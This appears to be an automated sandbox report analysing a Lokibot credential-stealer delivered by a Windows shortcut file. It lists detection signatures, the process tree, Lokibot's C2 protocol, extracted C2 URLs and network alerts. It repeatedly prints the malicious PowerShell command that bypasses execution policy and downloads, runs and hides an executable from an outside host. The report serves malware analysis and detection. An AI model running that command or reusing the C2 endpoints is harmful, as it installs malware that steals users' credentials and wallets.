Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Sample name:Comprobante.lnk.lnk
Analysis ID:1524798
MD5:b234c46d1f63b18ad2dc3f824bc0d6fa
SHA1:fbdcce6b33b9e0ffbba48aadca0db9059af37141
SHA256:8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
Tags:lnkuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 4552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • OpenWith.exe (PID: 2872 cmdline: "C:\Windows\system32\OpenWith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
    • mjtjewi.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\mjtjewi.exe" MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
      • mjtjewi.exe (PID: 1392 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
      • mjtjewi.exe (PID: 876 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
      • mjtjewi.exe (PID: 3568 cmdline: C:\Users\user\Desktop\mjtjewi.exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 36 entries
            SourceRuleDescriptionAuthorStrings
            6.2.mjtjewi.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              6.2.mjtjewi.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                6.2.mjtjewi.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  6.2.mjtjewi.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  6.2.mjtjewi.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 24 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi64_4552.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4552, TargetFilename: C:\Users\user\Desktop\mjtjewi.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';, ProcessId: 4552, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:49.077565+020020243121A Network Trojan was detected192.168.2.114971145.149.241.16980TCP
                    2024-10-03T09:20:50.285873+020020243121A Network Trojan was detected192.168.2.114971245.149.241.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-03T09:20:48.138102+020020253811Malware Command and Control Activity Detected192.168.2.114971145.149.241.16980TCP
                    2024-10-03T09:20:49.427132+020020253811Malware Command and Control Activity Detected192.168.2.114971245.149.241.16980TCP
                    2024-10-03T09:20:50.395968+020020253811Malware Command and Control Activity Detected192.168.2.114971345.149.241.16980TCP
                    2024-10-03T09:20:52.138116+020020253811Malware Command and Control Activity Detected192.168.2.114971445.149.241.16980TCP
                    2024-10-03T09:20:53.059614+020020253811Malware Command and Control Activity Detected192.168.2.114971545.149.241.16980TCP
                    2024-10-03T09:20:55.313220+020020253811Malware Command and Control Activity Detected192.168.2.114971745.149.241.16980TCP
                    2024-10-03T09:20:56.544536+020020253811Malware Command and Control Activity Detected192.168.2.114971845.149.241.16980TCP
                    2024-10-03T09:20:58.316168+020020253811Malware Command and Control Activity Detected192.168.2.115584345.149.241.16980TCP
                    2024-10-03T09:20:59.272737+020020253811Malware Command and Control Activity Detected192.168.2.116434845.149.241.16980TCP
                    2024-10-03T09:21:00.670903+020020253811Malware Command and Control Activity Detected192.168.2.116435045.149.241.16980TCP
                    2024-10-03T09:21:01.623467+020020253811Malware Command and Control Activity Detected192.168.2.116435245.149.241.16980TCP
                    2024-10-03T09:21:02.448704+020020253811Malware Command and Control Activity Detected192.168.2.116435445.149.241.16980TCP
                    2024-10-03T09:21:03.488048+020020253811Malware Command and Control Activity Detected192.168.2.116435545.149.241.16980TCP
                    2024-10-03T09:21:04.428362+020020253811Malware Command and Control Activity Detected192.168.2.116435745.149.241.16980TCP
                    2024-10-03T09:21:05.363793+020020253811Malware Command and Control Activity Detected192.168.2.116435845.149.241.16980TCP
                    2024-10-03T09:21:06.386274+020020253811Malware Command and Control Activity Detected192.168.2.116435945.149.241.16980TCP
                    2024-10-03T09:21:07.265208+020020253811Malware Command and Control Activity Detected192.168.2.116436045.149.241.16980TCP
                    2024-10-03T09:21:08.224949+020020253811Malware Command and Control Activity Detected192.168.2.116436145.149.241.16980TCP
                    2024-10-03T09:21:09.172629+020020253811Malware Command and Control Activity Detected192.168.2.116436245.149.241.16980TCP
                    2024-10-03T09:21:09.997521+020020253811Malware Command and Control Activity Detected192.168.2.116436345.149.241.16980TCP
                    2024-10-03T09:21:10.996788+020020253811Malware Command and Control Activity Detected192.168.2.116436445.149.241.16980TCP
                    2024-10-03T09:21:12.112321+020020253811Malware Command and Control Activity Detected192.168.2.116436545.149.241.16980TCP
                    2024-10-03T09:21:13.055508+020020253811Malware Command and Control Activity Detected192.168.2.116436645.149.241.16980TCP
                    2024-10-03T09:21:13.916854+020020253811Malware Command and Control Activity Detected192.168.2.116436745.149.241.16980TCP
                    2024-10-03T09:21:14.881238+020020253811Malware Command and Control Activity Detected192.168.2.116436845.149.241.16980TCP
                    2024-10-03T09:21:16.059969+020020253811Malware Command and Control Activity Detected192.168.2.116436945.149.241.16980TCP
                    2024-10-03T09:21:17.083633+020020253811Malware Command and Control Activity Detected192.168.2.116437045.149.241.16980TCP
                    2024-10-03T09:21:18.023488+020020253811Malware Command and Control Activity Detected192.168.2.116437145.149.241.16980TCP
                    2024-10-03T09:21:19.175709+020020253811Malware Command and Control Activity Detected192.168.2.116437245.149.241.16980TCP
                    2024-10-03T09:21:21.592824+020020253811Malware Command and Control Activity Detected192.168.2.116437345.149.241.16980TCP
                    2024-10-03T09:21:22.386915+020020253811Malware Command and Control Activity Detected192.168.2.116437445.149.241.16980TCP
                    2024-10-03T09:21:23.246842+020020253811Malware Command and Control Activity Detected192.168.2.116437545.149.241.16980TCP
                    2024-10-03T09:21:24.104473+020020253811Malware Command and Control Activity Detected192.168.2.116437645.149.241.16980TCP
                    2024-10-03T09:21:25.029228+020020253811Malware Command and Control Activity Detected192.168.2.116437845.149.241.16980TCP
                    2024-10-03T09:21:25.820375+020020253811Malware Command and Control Activity Detected192.168.2.116437945.149.241.16980TCP
                    2024-10-03T09:21:26.851586+020020253811Malware Command and Control Activity Detected192.168.2.116438045.149.241.16980TCP
                    2024-10-03T09:21:27.810227+020020253811Malware Command and Control Activity Detected192.168.2.116438145.149.241.16980TCP
                    2024-10-03T09:21:28.697925+020020253811Malware Command and Control Activity Detected192.168.2.116438245.149.241.16980TCP
                    2024-10-03T09:21:29.591807+020020253811Malware Command and Control Activity Detected192.168.2.116438345.149.241.16980TCP
                    2024-10-03T09:21:30.413511+020020253811Malware Command and Control Activity Detected192.168.2.116438445.149.241.16980TCP
                    2024-10-03T09:21:31.498785+020020253811Malware Command and Control Activity Detected192.168.2.116438545.149.241.16980TCP
                    2024-10-03T09:21:32.743030+020020253811Malware Command and Control Activity Detected192.168.2.116438645.149.241.16980TCP
                    2024-10-03T09:21:33.556187+020020253811Malware Command and Control Activity Detected192.168.2.116438745.149.241.16980TCP
                    2024-10-03T09:21:35.239657+020020253811Malware Command and Control Activity Detected192.168.2.116438845.149.241.16980TCP
                    2024-10-03T09:21:46.647501+020020253811Malware Command and Control Activity Detected192.168.2.116438945.149.241.16980TCP
                    2024-10-03T09:21:47.487101+020020253811Malware Command and Control Activity Detected192.168.2.116439045.149.241.16980TCP
                    2024-10-03T09:21:48.440836+020020253811Malware Command and Control Activity Detected192.168.2.116439145.149.241.16980TCP
                    2024-10-03T09:21:49.258711+020020253811Malware Command and Control Activity Detected192.168.2.116439245.149.241.16980TCP
                    2024-10-03T09:21:50.499694+020020253811Malware Command and Control Activity Detected192.168.2.116439345.149.241.16980TCP
                    2024-10-03T09:21:51.287566+020020253811Malware Command and Control Activity Detected192.168.2.116439445.149.241.16980TCP
                    2024-10-03T09:21:52.148748+020020253811Malware Command and Control Activity Detected192.168.2.116439545.149.241.16980TCP
                    2024-10-03T09:21:52.981934+020020253811Malware Command and Control Activity Detected192.168.2.116439645.149.241.16980TCP
                    2024-10-03T09:21:54.007169+020020253811Malware Command and Control Activity Detected192.168.2.116439745.149.241.16980TCP
                    2024-10-03T09:21:54.945256+020020253811Malware Command and Control Activity Detected192.168.2.116439845.149.241.16980TCP
                    2024-10-03T09:21:55.920209+020020253811Malware Command and Control Activity Detected192.168.2.116439945.149.241.16980TCP
                    2024-10-03T09:21:57.220850+020020253811Malware Command and Control Activity Detected192.168.2.116440045.149.241.16980TCP
                    2024-10-03T09:21:58.171912+020020253811Malware Command and Control Activity Detected192.168.2.116440145.149.241.16980TCP
                    2024-10-03T09:21:59.151255+020020253811Malware Command and Control Activity Detected192.168.2.116440245.149.241.16980TCP
                    2024-10-03T09:22:00.075267+020020253811Malware Command and Control Activity Detected192.168.2.116440345.149.241.16980TCP
                    2024-10-03T09:22:01.051486+020020253811Malware Command and Control Activity Detected192.168.2.116440445.149.241.16980TCP
                    2024-10-03T09:22:03.157629+020020253811Malware Command and Control Activity Detected192.168.2.116440545.149.241.16980TCP
                    2024-10-03T09:22:04.115545+020020253811Malware Command and Control Activity Detected192.168.2.116440645.149.241.16980TCP
                    2024-10-03T09:22:05.338912+020020253811Malware Command and Control Activity Detected192.168.2.116440745.149.241.16980TCP
                    2024-10-03T09:22:06.283716+020020253811Malware Command and Control Activity Detected192.168.2.116440845.149.241.16980TCP
                    2024-10-03T09:22:07.225458+020020253811Malware Command and Control Activity Detected192.168.2.116440945.149.241.16980TCP
                    2024-10-03T09:22:08.313595+020020253811Malware Command and Control Activity Detected192.168.2.116441045.149.241.16980TCP
                    2024-10-03T09:22:09.230403+020020253811Malware Command and Control Activity Detected192.168.2.116441145.149.241.16980TCP
